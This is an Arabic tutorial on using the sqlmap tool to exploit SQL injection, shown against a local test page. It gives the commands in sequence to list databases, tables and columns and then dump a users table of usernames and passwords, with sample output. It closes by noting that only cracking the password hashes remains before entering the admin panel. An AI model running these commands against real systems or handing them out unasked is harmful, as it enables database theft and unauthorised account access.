بإمكان أداة SQLMAP القيام بفحص عدة أنواع من قواعد البيانات و هي:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase and SAP MaxDB database management systems.
طريقة اﻹستخدام: بالنسبة لمن يستخدمون نظام باك تراك فعليهم كتابة اﻷوامر كالتالي
./sqlmap.py command
في حين من يستخدمون نظام كالي لينكس فعليهم كتابة اﻷوامر كالتالي:
sqlmap command
باعتبار أني من مستخدمي كالي لينكس فسأستعمل اﻷمر الثاني.ﻻستعراض قواعد البيانات الموجودة على السيرفر يكفي كتابة اﻷمر التالي:
sqlmap -u “http://127.0.0.1/vurln.php?user=relax” –dbs –dbms=mysql
دعونا نشرح هذا اﻷمر بالتفصيل:
sqlmap : و هو مشروعنا الذي هو محور الدرس بطبيعة الحال
u- : و معناها أننا نريد فحص URL مشكوك في أمره،يجب كتابة العنوان مباشرة بعد u- بين علامتي تنصيص مزدوجتين “URL”
الرابط الذي أرفقناه هو عبارة عن رابط عضوية الشخص المسمى relax.
dbs- : و معناها أننا نطلب من مشروع SQLMAP التحري عن كل قواعد البيانات و عرض أسمائها
dbms=mysql- : و معناها أننا نخبر مشروع SQLMAP بأن السيرفر يستخدم محرك قواعد البيانات MySQL
سنفترض أنه المشروع قد قام بالبحث و وجدت عددا من قواعد البيانات هي كالتالي:
available databases [4]:
information_schema
mysql
performance_schema
vurln
سنستهدف اﻵن قاعدة البيانات vurln و نريد استعراض الجداول التي تحويها…اﻷمر بسيط جدا فكل ما عليك فعله هو تطبيق اﻷمر التالي:
sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln –tables
أعتقد أن اﻷمر بسيط و لم يتغير كثيرا عن سابقه إﻻ في نهايته:
D- معناها قم بعملية Dumping لقاعدة البيانات vurln و قم باستخراج ما سنطلبه و هو
tables- : بعد انتهاء عملية Dumping قم باستعراض جداول قاعدة البيانات و لنفترض أنها تحوي جدوﻻ واحدا هو جدول المستخدمين
Database: vurln
[1 table] +——-+
| users |
+——-+
اﻵن سنعمل على استخراج الخانات الموجودة في الجدول users عن طريق اﻷمر التالي:
sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln -T users –col
سنشرح فقط اﻷجزاء الجديدة من اﻷمر،بعد القيام بعملية Dumping لقاعدة البيانات:
T- معناها أعد عملية Dumping للجدول المعطى و هو users
col– : و معناها استخرج الخانات Columns و سنفترض أنه قد أعطانا النتيجة التالية:
Database: vurln
Table: users
[3 columns] +———-+————-+
| Column Type |
+———-+————-+
| ID | tinyint(4) |
| password | varchar(32) |
| username | varchar(20) |
+———-+————-+
أخيرا و ﻹتمام العملية لم يبقى لنا سوى العمل على استعراض الجدول عن طريق اﻷمر
sqlmap -u “http://127.0.0.1/vurln.php?user=relax” -D vurln -T users –dump
لم يبقى أمامك إﻻ كسر تشفير كلمات المرور من أجل الدخول إلى لوحة تحكم اﻹدارة.